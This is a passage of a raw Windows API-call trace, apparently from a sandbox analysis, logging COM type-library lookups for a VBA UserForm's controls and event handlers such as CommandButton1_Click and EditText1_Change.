This=0x6a6e948, index=0x69, ppFuncDesc=0x184528, pDummy=0x180 | out: ppFuncDesc=0x184528, pDummy=0x180) returned 0x0 [0041.971] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.971] ITypeInfo:RemoteGetDocumentation (in: This=0x6a6e948, memid=2009, refPtrFlags=0x184568, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0041.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TextBox2", cchWideChar=9, lpMultiByteStr=0x184420, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TextBox2", lpUsedDefaultChar=0x0) returned 9 [0041.971] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="TextBox2") returned 0x1053a7 [0041.971] ITypeInfo:GetRefTypeInfo (in: This=0x6a6e948, hreftype=0x5000025, ppTInfo=0x184540 | out: ppTInfo=0x184540*=0x6ceee08) returned 0x0 [0041.971] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceee08, ppTypeAttr=0x1844a0, pDummy=0x2a6 | out: ppTypeAttr=0x1844a0, pDummy=0x2a6) returned 0x0 [0041.971] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceee08) returned 0x0 [0041.971] ITypeInfo:GetImplTypeFlags (in: This=0x6ceee08, index=0x0, pImplTypeFlags=0x184488 | out: pImplTypeFlags=0x184488*=1) returned 0x0 [0041.971] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceee08, index=0x0, pRefType=0x184490 | out: pRefType=0x184490*=0x2200) returned 0x0 [0041.971] ITypeInfo:GetRefTypeInfo (in: This=0x6ceee08, hreftype=0x2200, ppTInfo=0x184498 | out: ppTInfo=0x184498*=0x6ceee60) returned 0x0 [0041.971] IUnknown:Release (This=0x6ceee60) returned 0x0 [0041.971] ITypeInfo:GetImplTypeFlags (in: This=0x6ceee08, index=0x1, pImplTypeFlags=0x184488 | out: pImplTypeFlags=0x184488*=3) returned 0x0 [0041.971] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceee08, index=0x1, pRefType=0x184490 | out: pRefType=0x184490*=0x2a00) returned 0x0 [0041.971] ITypeInfo:GetRefTypeInfo (in: This=0x6ceee08, hreftype=0x2a00, ppTInfo=0x184498 | out: ppTInfo=0x184498*=0x6ceefc0) returned 0x0 [0041.971] IUnknown:QueryInterface (in: This=0x6ceefc0, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1843c0 | out: ppvObject=0x1843c0*=0x0) returned 0x80004002 [0041.971] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceefc0, ppTypeAttr=0x1843e8, pDummy=0x10 | out: ppTypeAttr=0x1843e8, pDummy=0x10) returned 0x0 [0041.971] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceefc0) returned 0x0 [0041.971] IUnknown:Release (This=0x6ceefc0) returned 0x6 [0041.971] IUnknown:Release (This=0x6ceee08) returned 0x1 [0041.971] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x6a, ppFuncDesc=0x184528, pDummy=0x180 | out: ppFuncDesc=0x184528, pDummy=0x180) returned 0x0 [0041.971] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.971] ITypeInfo:RemoteGetDocumentation (in: This=0x6a6e948, memid=2010, refPtrFlags=0x184568, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0041.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComboBox1", cchWideChar=10, lpMultiByteStr=0x184420, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ComboBox1", lpUsedDefaultChar=0x0) returned 10 [0041.971] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ComboBox1") returned 0x10d827 [0041.972] ITypeInfo:GetRefTypeInfo (in: This=0x6a6e948, hreftype=0x5000031, ppTInfo=0x184540 | out: ppTInfo=0x184540*=0x6cef018) returned 0x0 [0041.972] ITypeInfo:RemoteGetTypeAttr (in: This=0x6cef018, ppTypeAttr=0x1844a0, pDummy=0x2a8 | out: ppTypeAttr=0x1844a0, pDummy=0x2a8) returned 0x0 [0041.972] ITypeInfo:LocalReleaseTypeAttr (This=0x6cef018) returned 0x0 [0041.972] ITypeInfo:GetImplTypeFlags (in: This=0x6cef018, index=0x0, pImplTypeFlags=0x184488 | out: pImplTypeFlags=0x184488*=1) returned 0x0 [0041.972] ITypeInfo:GetRefTypeOfImplType (in: This=0x6cef018, index=0x0, pRefType=0x184490 | out: pRefType=0x184490*=0x2300) returned 0x0 [0041.972] ITypeInfo:GetRefTypeInfo (in: This=0x6cef018, hreftype=0x2300, ppTInfo=0x184498 | out: ppTInfo=0x184498*=0x6cef070) returned 0x0 [0041.972] IUnknown:Release (This=0x6cef070) returned 0x0 [0041.972] ITypeInfo:GetImplTypeFlags (in: This=0x6cef018, index=0x1, pImplTypeFlags=0x184488 | out: pImplTypeFlags=0x184488*=3) returned 0x0 [0041.972] ITypeInfo:GetRefTypeOfImplType (in: This=0x6cef018, index=0x1, pRefType=0x184490 | out: pRefType=0x184490*=0x2c00) returned 0x0 [0041.972] ITypeInfo:GetRefTypeInfo (in: This=0x6cef018, hreftype=0x2c00, ppTInfo=0x184498 | out: ppTInfo=0x184498*=0x6cef120) returned 0x0 [0041.972] IUnknown:QueryInterface (in: This=0x6cef120, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1843c0 | out: ppvObject=0x1843c0*=0x0) returned 0x80004002 [0041.972] ITypeInfo:RemoteGetTypeAttr (in: This=0x6cef120, ppTypeAttr=0x1843e8, pDummy=0x10 | out: ppTypeAttr=0x1843e8, pDummy=0x10) returned 0x0 [0041.972] ITypeInfo:LocalReleaseTypeAttr (This=0x6cef120) returned 0x0 [0041.972] IUnknown:Release (This=0x6cef120) returned 0x1 [0041.972] IUnknown:Release (This=0x6cef018) returned 0x1 [0041.972] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x6b, ppFuncDesc=0x184528, pDummy=0x180 | out: ppFuncDesc=0x184528, pDummy=0x180) returned 0x0 [0041.972] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.972] ITypeInfo:RemoteGetDocumentation (in: This=0x6a6e948, memid=2011, refPtrFlags=0x184568, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0041.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommandButton1", cchWideChar=15, lpMultiByteStr=0x184420, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommandButton1", lpUsedDefaultChar=0x0) returned 15 [0041.972] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CommandButton1") returned 0x10d47c [0041.972] ITypeInfo:GetRefTypeInfo (in: This=0x6a6e948, hreftype=0x500003d, ppTInfo=0x184540 | out: ppTInfo=0x184540*=0x6cef178) returned 0x0 [0041.972] ITypeInfo:RemoteGetTypeAttr (in: This=0x6cef178, ppTypeAttr=0x1844a0, pDummy=0x2aa | out: ppTypeAttr=0x1844a0, pDummy=0x2aa) returned 0x0 [0041.972] ITypeInfo:LocalReleaseTypeAttr (This=0x6cef178) returned 0x0 [0041.972] ITypeInfo:GetImplTypeFlags (in: This=0x6cef178, index=0x0, pImplTypeFlags=0x184488 | out: pImplTypeFlags=0x184488*=1) returned 0x0 [0041.972] ITypeInfo:GetRefTypeOfImplType (in: This=0x6cef178, index=0x0, pRefType=0x184490 | out: pRefType=0x184490*=0x2100) returned 0x0 [0041.972] ITypeInfo:GetRefTypeInfo (in: This=0x6cef178, hreftype=0x2100, ppTInfo=0x184498 | out: ppTInfo=0x184498*=0x6cef1d0) returned 0x0 [0041.972] IUnknown:Release (This=0x6cef1d0) returned 0x0 [0041.972] ITypeInfo:GetImplTypeFlags (in: This=0x6cef178, index=0x1, pImplTypeFlags=0x184488 | out: pImplTypeFlags=0x184488*=3) returned 0x0 [0041.972] ITypeInfo:GetRefTypeOfImplType (in: This=0x6cef178, index=0x1, pRefType=0x184490 | out: pRefType=0x184490*=0x2900) returned 0x0 [0041.972] ITypeInfo:GetRefTypeInfo (in: This=0x6cef178, hreftype=0x2900, ppTInfo=0x184498 | out: ppTInfo=0x184498*=0x6cef280) returned 0x0 [0041.972] IUnknown:QueryInterface (in: This=0x6cef280, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1843c0 | out: ppvObject=0x1843c0*=0x0) returned 0x80004002 [0041.972] ITypeInfo:RemoteGetTypeAttr (in: This=0x6cef280, ppTypeAttr=0x1843e8, pDummy=0x10 | out: ppTypeAttr=0x1843e8, pDummy=0x10) returned 0x0 [0041.972] ITypeInfo:LocalReleaseTypeAttr (This=0x6cef280) returned 0x0 [0041.973] IUnknown:Release (This=0x6cef280) returned 0x2 [0041.973] IUnknown:Release (This=0x6cef178) returned 0x1 [0041.973] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x6c, ppFuncDesc=0x184528, pDummy=0x180 | out: ppFuncDesc=0x184528, pDummy=0x180) returned 0x0 [0041.973] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.973] ITypeInfo:RemoteGetDocumentation (in: This=0x6a6e948, memid=2012, refPtrFlags=0x184568, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0041.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommandButton2", cchWideChar=15, lpMultiByteStr=0x184420, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommandButton2", lpUsedDefaultChar=0x0) returned 15 [0041.973] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CommandButton2") returned 0x10d47d [0041.973] ITypeInfo:GetRefTypeInfo (in: This=0x6a6e948, hreftype=0x500003d, ppTInfo=0x184540 | out: ppTInfo=0x184540*=0x6cef178) returned 0x0 [0041.973] ITypeInfo:RemoteGetTypeAttr (in: This=0x6cef178, ppTypeAttr=0x1844a0, pDummy=0x2ac | out: ppTypeAttr=0x1844a0, pDummy=0x2ac) returned 0x0 [0041.973] ITypeInfo:LocalReleaseTypeAttr (This=0x6cef178) returned 0x0 [0041.973] ITypeInfo:GetImplTypeFlags (in: This=0x6cef178, index=0x0, pImplTypeFlags=0x184488 | out: pImplTypeFlags=0x184488*=1) returned 0x0 [0041.973] ITypeInfo:GetRefTypeOfImplType (in: This=0x6cef178, index=0x0, pRefType=0x184490 | out: pRefType=0x184490*=0x2100) returned 0x0 [0041.973] ITypeInfo:GetRefTypeInfo (in: This=0x6cef178, hreftype=0x2100, ppTInfo=0x184498 | out: ppTInfo=0x184498*=0x6cef1d0) returned 0x0 [0041.973] IUnknown:Release (This=0x6cef1d0) returned 0x0 [0041.973] ITypeInfo:GetImplTypeFlags (in: This=0x6cef178, index=0x1, pImplTypeFlags=0x184488 | out: pImplTypeFlags=0x184488*=3) returned 0x0 [0041.973] ITypeInfo:GetRefTypeOfImplType (in: This=0x6cef178, index=0x1, pRefType=0x184490 | out: pRefType=0x184490*=0x2900) returned 0x0 [0041.973] ITypeInfo:GetRefTypeInfo (in: This=0x6cef178, hreftype=0x2900, ppTInfo=0x184498 | out: ppTInfo=0x184498*=0x6cef280) returned 0x0 [0041.973] IUnknown:QueryInterface (in: This=0x6cef280, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1843c0 | out: ppvObject=0x1843c0*=0x0) returned 0x80004002 [0041.973] ITypeInfo:RemoteGetTypeAttr (in: This=0x6cef280, ppTypeAttr=0x1843e8, pDummy=0x10 | out: ppTypeAttr=0x1843e8, pDummy=0x10) returned 0x0 [0041.973] ITypeInfo:LocalReleaseTypeAttr (This=0x6cef280) returned 0x0 [0041.973] IUnknown:Release (This=0x6cef280) returned 0x2 [0041.973] IUnknown:Release (This=0x6cef178) returned 0x1 [0041.973] IUnknown:QueryInterface (in: This=0x6a6e9a8, riid=0x7fee45d40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x184548 | out: ppvObject=0x184548*=0x6a6e9a8) returned 0x0 [0041.973] ITypeInfo2:GetCustData (in: This=0x6a6e9a8, GUID=0x7fee45dd970*(Data1=0xba65d790, Data2=0x9301, Data3=0x11cf, Data4=([0]=0x8d, [1]=0x22, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x37, [6]=0x53, [7]=0x84)), pVarVal=0x184558 | out: pVarVal=0x184558*(varType=0x0, wReserved1=0x0, wReserved2=0x6c, wReserved3=0x0, varVal1=0x2ac00000000, varVal2=0x6884738)) returned 0x0 [0041.973] IUnknown:Release (This=0x6a6e9a8) returned 0x3 [0041.973] ITypeInfo:RemoteGetDocumentation (in: This=0x6a6e9a8, memid=-1, refPtrFlags=0x184550, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x500003d | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x500003d) returned 0x0 [0041.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="UserForm", cchWideChar=9, lpMultiByteStr=0x184460, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UserForm", lpUsedDefaultChar=0x0) returned 9 [0041.973] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UserForm") returned 0x10044e [0041.973] IUnknown:QueryInterface (in: This=0x6ccf078, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184500 | out: ppvObject=0x184500*=0x0) returned 0x80004002 [0041.973] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ccf078, ppTypeAttr=0x184528, pDummy=0x10 | out: ppTypeAttr=0x184528, pDummy=0x10) returned 0x0 [0041.973] ITypeInfo:LocalReleaseTypeAttr (This=0x6ccf078) returned 0x0 [0041.973] IUnknown:Release (This=0x6a6e948) returned 0x3 [0041.973] IUnknown:Release (This=0x6ccf078) returned 0x2 [0041.973] IUnknown:Release (This=0x6a6e9a8) returned 0x2 [0041.973] IUnknown:AddRef (This=0x6ccf078) returned 0x3 [0041.973] IUnknown:Release (This=0x6ccf078) returned 0x2 [0041.974] IUnknown:AddRef (This=0x6ceefc0) returned 0x7 [0041.974] IUnknown:Release (This=0x6ceefc0) returned 0x6 [0041.974] IUnknown:AddRef (This=0x6cef120) returned 0x2 [0041.974] IUnknown:Release (This=0x6cef120) returned 0x1 [0041.974] IUnknown:AddRef (This=0x6ceefc0) returned 0x7 [0041.974] IUnknown:Release (This=0x6ceefc0) returned 0x6 [0041.974] IUnknown:AddRef (This=0x6ceefc0) returned 0x7 [0041.974] IUnknown:Release (This=0x6ceefc0) returned 0x6 [0041.974] IUnknown:AddRef (This=0x6ceefc0) returned 0x7 [0041.974] IUnknown:Release (This=0x6ceefc0) returned 0x6 [0041.974] IUnknown:AddRef (This=0x6ceefc0) returned 0x7 [0041.974] IUnknown:Release (This=0x6ceefc0) returned 0x6 [0041.974] IUnknown:AddRef (This=0x6cef280) returned 0x3 [0041.974] IUnknown:Release (This=0x6cef280) returned 0x2 [0041.974] IUnknown:AddRef (This=0x6cef280) returned 0x3 [0041.974] IUnknown:Release (This=0x6cef280) returned 0x2 [0041.974] IUnknown:AddRef (This=0x6ceefc0) returned 0x7 [0041.974] IUnknown:Release (This=0x6ceefc0) returned 0x6 [0041.974] IUnknown:QueryInterface (in: This=0x6a6e948, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184760 | out: ppvObject=0x184760*=0x0) returned 0x80004002 [0041.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2bee, cbMultiByte=17, lpWideCharStr=0x1847e0, cchWideChar=34 | out: lpWideCharStr="EditText1_Change") returned 17 [0041.974] ITypeInfo:GetTypeComp (in: This=0x6a6e948, ppTComp=0x184748 | out: ppTComp=0x184748*=0x6a6e950) returned 0x0 [0041.974] ITypeComp:RemoteBind (in: This=0x6a6e950, szName="EditText1_Change", lHashVal=0x10e9b8, wFlags=0x0, ppTInfo=0x184738, pDescKind=0x184758, ppFuncDesc=0x184778, ppVarDesc=0x0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x184738*=0x0, pDescKind=0x184758*=0, ppFuncDesc=0x184778, ppVarDesc=0x0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0041.974] IUnknown:Release (This=0x6a6e950) returned 0x4 [0041.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2bee, cbMultiByte=17, lpWideCharStr=0x1847e0, cchWideChar=34 | out: lpWideCharStr="EditText1_Change") returned 17 [0041.974] LHashValOfNameSys (syskind=0x1, lcid=0x409, szName=" ") returned 0x101037 [0041.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="EditText1_Change", cchWideChar=-1, lpMultiByteStr=0x184600, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EditText1_Change", lpUsedDefaultChar=0x0) returned 17 [0041.974] LHashValOfNameSys (syskind=0x1, lcid=0x409, szName=" ") returned 0x101037 [0041.974] _mbscpy_s (in: _Dst=0x184820, _DstSizeInBytes=0x11, _Src=0x38a2bee | out: _Dst=0x184820) returned 0x0 [0041.974] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="EditText1") returned 0x1097ee [0041.974] _mbscpy_s (in: _Dst=0x184820, _DstSizeInBytes=0x11, _Src=0x18482a | out: _Dst=0x184820) returned 0x0 [0041.974] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Change") returned 0x10c7a3 [0041.975] strcpy_s (in: _Dst=0x184680, _DstSize=0x7, _Src="Change" | out: _Dst="Change") returned 0x0 [0041.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x184680, cbMultiByte=7, lpWideCharStr=0x1844d0, cchWideChar=7 | out: lpWideCharStr="Change") returned 7 [0041.975] IUnknown:AddRef (This=0x6990960) returned 0x8 [0041.975] ITypeLib:RemoteIsName (in: This=0x6990960, szNameBuf="Change", lHashVal=0x10c7a3, pfName=0x1845a0, pBstrLibName=0x1844d0 | out: pfName=0x1845a0*=0, pBstrLibName=0x1844d0) returned 0x0 [0041.975] IUnknown:Release (This=0x6990960) returned 0x7 [0041.975] IUnknown:AddRef (This=0x6992850) returned 0x12 [0041.975] ITypeLib:RemoteIsName (in: This=0x6992850, szNameBuf="Change", lHashVal=0x10c7a3, pfName=0x1845a0, pBstrLibName=0x1844d0 | out: pfName=0x1845a0*=0, pBstrLibName=0x1844d0) returned 0x0 [0041.975] IUnknown:Release (This=0x6992850) returned 0x11 [0041.975] IUnknown:AddRef (This=0x6992df0) returned 0xd [0041.975] ITypeLib:RemoteIsName (in: This=0x6992df0, szNameBuf="Change", lHashVal=0x10c7a3, pfName=0x1845a0, pBstrLibName=0x1844d0 | out: pfName=0x1845a0*=0, pBstrLibName=0x1844d0) returned 0x0 [0041.975] IUnknown:Release (This=0x6992df0) returned 0xc [0041.975] IUnknown:AddRef (This=0x6992580) returned 0x7 [0041.975] ITypeLib:RemoteIsName (in: This=0x6992580, szNameBuf="Change", lHashVal=0x10c7a3, pfName=0x1845a0, pBstrLibName=0x1844d0 | out: pfName=0x1845a0*=1, pBstrLibName=0x1844d0) returned 0x0 [0041.975] IUnknown:Release (This=0x6992580) returned 0x6 [0041.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Change", cchWideChar=-1, lpMultiByteStr=0x184680, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Change", lpUsedDefaultChar=0x0) returned 7 [0041.975] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Change") returned 0x10c7a3 [0041.975] IUnknown:QueryInterface (in: This=0x6ceefc0, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184738 | out: ppvObject=0x184738*=0x0) returned 0x80004002 [0041.975] IUnknown:QueryInterface (in: This=0x6ceefc0, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184740 | out: ppvObject=0x184740*=0x0) returned 0x80004002 [0041.975] ITypeInfo:GetTypeComp (in: This=0x6ceefc0, ppTComp=0x184748 | out: ppTComp=0x184748*=0x6ceefc8) returned 0x0 [0041.975] IMalloc:Alloc (This=0x7feffc15380, cb=0x38) returned 0x6880630 [0041.975] IUnknown:AddRef (This=0x6ceefc8) returned 0x9 [0041.975] IUnknown:Release (This=0x6ceefc8) returned 0x8 [0041.975] IMalloc:Realloc (This=0x7feffc15380, pv=0x6c29d20, cb=0xb0) returned 0x6b0e2a0 [0041.975] IUnknown:Release (This=0x6ceefc0) returned 0x7 [0041.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x505062e, cbMultiByte=7, lpWideCharStr=0x184530, cchWideChar=8 | out: lpWideCharStr="Change") returned 7 [0041.975] IMalloc:Alloc (This=0x7feffc15380, cb=0x640) returned 0x6cc2380 [0041.975] IMalloc:Alloc (This=0x7feffc15380, cb=0x20) returned 0x68e9df0 [0041.975] IMalloc:Alloc (This=0x7feffc15380, cb=0x0) returned 0x6c13fb0 [0041.975] IMalloc:Alloc (This=0x7feffc15380, cb=0x0) returned 0x6cbe540 [0041.975] IMalloc:Alloc (This=0x7feffc15380, cb=0x20) returned 0x68e9e20 [0041.975] IMalloc:Alloc (This=0x7feffc15380, cb=0x80) returned 0x6b9cf10 [0041.975] ITypeComp:RemoteBind (in: This=0x6ceefc8, szName="Change", lHashVal=0x10c7a3, wFlags=0x1, ppTInfo=0x1844e8, pDescKind=0x1844fc, ppFuncDesc=0x184500, ppVarDesc=0x0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1844e8*=0x6ceefc0, pDescKind=0x1844fc*=1, ppFuncDesc=0x184500, ppVarDesc=0x0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0041.975] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceefc0, ppTypeAttr=0x1844f0, pDummy=0x1 | out: ppTypeAttr=0x1844f0, pDummy=0x1) returned 0x0 [0041.975] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceefc0) returned 0x0 [0041.976] IUnknown:QueryInterface (in: This=0x6ceefc0, riid=0x7fee45d40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x184350 | out: ppvObject=0x184350*=0x6ceefc0) returned 0x0 [0041.976] ITypeInfo2:GetFuncIndexOfMemId (in: This=0x6ceefc0, memid=2, invkind=1, pFuncIndex=0x184390 | out: pFuncIndex=0x184390*=0x2) returned 0x0 [0041.976] ITypeInfo2:GetFuncCustData (in: This=0x6ceefc0, index=0x2, GUID=0x7fee45e3758*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x1843a8 | out: pVarVal=0x1843a8*(varType=0x0, wReserved1=0x0, wReserved2=0x7fe, wReserved3=0x0, varVal1=0x184450, varVal2=0x6b0db20)) returned 0x0 [0041.976] IUnknown:Release (This=0x6ceefc0) returned 0x8 [0041.976] IUnknown:AddRef (This=0x6ceefc0) returned 0x9 [0041.976] ITypeInfo:LocalReleaseFuncDesc (This=0x6ceefc0) returned 0x0 [0041.976] IUnknown:Release (This=0x6ceefc0) returned 0x8 [0041.976] IUnknown:QueryInterface (in: This=0x6ceefc0, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1845a8 | out: ppvObject=0x1845a8*=0x0) returned 0x80004002 [0041.976] IUnknown:AddRef (This=0x6ceefc0) returned 0x9 [0041.976] IUnknown:Release (This=0x6ceefc0) returned 0x8 [0041.976] IUnknown:QueryInterface (in: This=0x6a6e948, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184760 | out: ppvObject=0x184760*=0x0) returned 0x80004002 [0041.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2c4a, cbMultiByte=21, lpWideCharStr=0x1847e0, cchWideChar=42 | out: lpWideCharStr="CommandButton1_Click") returned 21 [0041.976] ITypeInfo:GetTypeComp (in: This=0x6a6e948, ppTComp=0x184748 | out: ppTComp=0x184748*=0x6a6e950) returned 0x0 [0041.976] ITypeComp:RemoteBind (in: This=0x6a6e950, szName="CommandButton1_Click", lHashVal=0x10c1e4, wFlags=0x0, ppTInfo=0x184738, pDescKind=0x184758, ppFuncDesc=0x184778, ppVarDesc=0x0, ppTypeComp=0xffffffff00000000, pDummy=0x0 | out: ppTInfo=0x184738*=0x0, pDescKind=0x184758*=0, ppFuncDesc=0x184778, ppVarDesc=0x0, ppTypeComp=0xffffffff00000000, pDummy=0x0) returned 0x0 [0041.976] IUnknown:Release (This=0x6a6e950) returned 0x4 [0041.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2c4a, cbMultiByte=21, lpWideCharStr=0x1847e0, cchWideChar=42 | out: lpWideCharStr="CommandButton1_Click") returned 21 [0041.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommandButton1_Click", cchWideChar=-1, lpMultiByteStr=0x184600, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommandButton1_Click", lpUsedDefaultChar=0x0) returned 21 [0041.976] _mbscpy_s (in: _Dst=0x184820, _DstSizeInBytes=0x15, _Src=0x38a2c4a | out: _Dst=0x184820) returned 0x0 [0041.976] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CommandButton1") returned 0x10d47c [0041.976] _mbscpy_s (in: _Dst=0x184820, _DstSizeInBytes=0x15, _Src=0x18482f | out: _Dst=0x184820) returned 0x0 [0041.976] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Click") returned 0x10e38a [0041.976] strcpy_s (in: _Dst=0x184680, _DstSize=0x6, _Src="Click" | out: _Dst="Click") returned 0x0 [0041.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x184680, cbMultiByte=6, lpWideCharStr=0x1844d0, cchWideChar=6 | out: lpWideCharStr="Click") returned 6 [0041.976] IUnknown:AddRef (This=0x6990960) returned 0x8 [0041.976] ITypeLib:RemoteIsName (in: This=0x6990960, szNameBuf="Click", lHashVal=0x10e38a, pfName=0x1845a0, pBstrLibName=0x1844d0 | out: pfName=0x1845a0*=0, pBstrLibName=0x1844d0) returned 0x0 [0041.976] IUnknown:Release (This=0x6990960) returned 0x7 [0041.976] IUnknown:AddRef (This=0x6992850) returned 